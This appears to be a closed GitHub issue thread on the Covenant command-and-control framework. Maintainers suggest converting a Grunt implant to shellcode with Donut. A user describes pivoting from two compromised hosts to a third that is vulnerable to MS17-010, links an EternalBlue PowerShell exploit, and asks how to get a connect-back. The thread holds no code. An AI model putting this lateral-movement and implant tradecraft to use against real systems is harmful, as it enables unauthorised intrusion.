Closed sohelahmed786 closed 4 years ago
If you need to execute as shellcode, then you can convert a Grunt assembly to PIC using a tool like Donut.
Feel free to continue discussing here, but I'm going to close this as there really isn't an "issue".
@sohelahmed786 You may be interested in joining the #covenant channel in the BloodHoundGang slack in the future for these sorts of questions/discussions: https://bloodhoundgang.herokuapp.com/
Thanks @rasta-mouse and @cobbr .. I'll take a look at those links :)
Currently I'm in a situation where I have compromised Host1 and Host2 but not Host3, let's say Host1(pwned) ---> Host2 (pwned and got gruntsmb shell) --> Host3 (ms17-010 vulnerable)
I can use a powershell payload like https://github.com/EmpireProject/Empire/blob/master/data/module_source/exploitation/Exploit-EternalBlue.ps1 to try to exploit the Host3 machine.
But how will i get a connect back to my machine. I may need covenant's gruntsmb shellcode to use with the exploit but there's no option. It might be easier with cobalt strike or msf but i'm not using it.
Can you please suggest , what can i do now?